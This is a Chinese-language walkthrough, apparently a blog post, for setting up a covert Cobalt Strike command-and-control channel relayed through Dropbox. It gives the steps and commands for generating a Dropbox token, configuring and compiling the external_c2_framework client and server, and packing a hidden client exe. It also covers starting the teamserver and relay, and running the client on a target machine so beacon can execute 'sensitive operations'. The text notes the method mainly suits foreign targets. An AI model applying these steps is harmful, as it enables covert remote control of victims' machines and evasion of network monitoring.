利用Dropbox中转自己的C2
0x00 前言
0x01 环境准备
1、注册dropbox账号
2、Kali Linux(cobaltstrike服务器以及dropbox的server端)
(1)Kali自带的java环境是OpenJdk版的,需要卸载重装OracleJdk版本(具体方法可自行百度)
(2)安装好 mingw 编译环境 ,并自行设置环境变量
(3)准备好cobaltstrike(此处用的是3.8版本)
3、32位win7系统
(1)准备好python环境(此次实验用的是2.7版本)
(2)通过pip安装两个程序
# pip install pyinstaller
# pip install dropbox
注:由于国家防火墙的原因,如果想要在本地完成此次操作,需要挂上VPN代理,所以此方法可能主要适用于对国外的目标使用
0x02 通过dropbox创建app获取token
(1)通过如下页面创建一个app
(2)通过刚才创建的app生成token,如图,点击Generate就可以生成一个token,这个token的作用就是让dropbox来帮助中转c2
0x03 配置客户端(client)和服务端(server)
(1)下载external_c2_framework
git clone https://github.com/Truneski/external_c2_framework.git
(2)编辑下载文件夹external_c2_framework内的dbox_client.py
vim external_c2_framework/builds/client/dbox/dbox_client.py
(3)再编辑下载文件夹external_c2_framework内的transport_dbox.py
vim external_c2_framework/builds/server/utils/transports/transport_dbox.py
(4)依托mingw编译,通过执行external_c2_framework/builds/client/dbox目录下的compile_dll.sh脚本编译生成dll
备注:如果您是使用我提供的环境,使用java或者执行compile_dll.sh脚本的时候会报错,需要使用命令:source /etc/profile 。然后再执行才能成功。具体原因应该是我环境变量的问题,暂时没解决
(5)在32位windows 7 机器上打包external_c2_framework/builds/client目录下的程序为exe
将整个external_c2_framework/builds/client/目录下的文件拷贝到32位win7系统上
将压缩好的zip文件拷贝到32位win7上并解压缩
- 执行以下命令:
pyinstaller.exe -w -F C:\Users\xx\Desktop\dropbox\dbox\dbox_client.py
打包好的exe文件在如下显示的位置:
0x04 进入正题
(1)在kali上启动cs,并且创建监听器
执行命令启动cs服务端
./teamserver 192.168.74.140 123456
启动cs客户端登陆cs服务器
- 创建一个监听器
(2)加载external_c2_framework里的start_externalc2.cna 脚本
(3)如果中转c2数据的服务器和我们自己的cs服务器不在同一台机器上,那么可以通过external_c2_framework/builds/server/config.py进行修改,对ip,port等进行一个设置,如果中转c2数据的服务和我们的cs服务器是同一个机器,那么这个配置文件默认即可。具体如下:
(4)启动中转的服务
python external_c2_framework/builds/server/dbox_server.py
启动过后,如果没有运行我们刚才制作好的exe客户端文件会一直停留在这个状态
(5)去目标服务器启动客户端(我们制作好的exe文件:dbox_client.exe)
成功启动客户端过后,可以看到刚才启动服务的程序已经开始下一步的运行:
(5)目标机器成功上线
(6)通过beacon执行一些敏感操作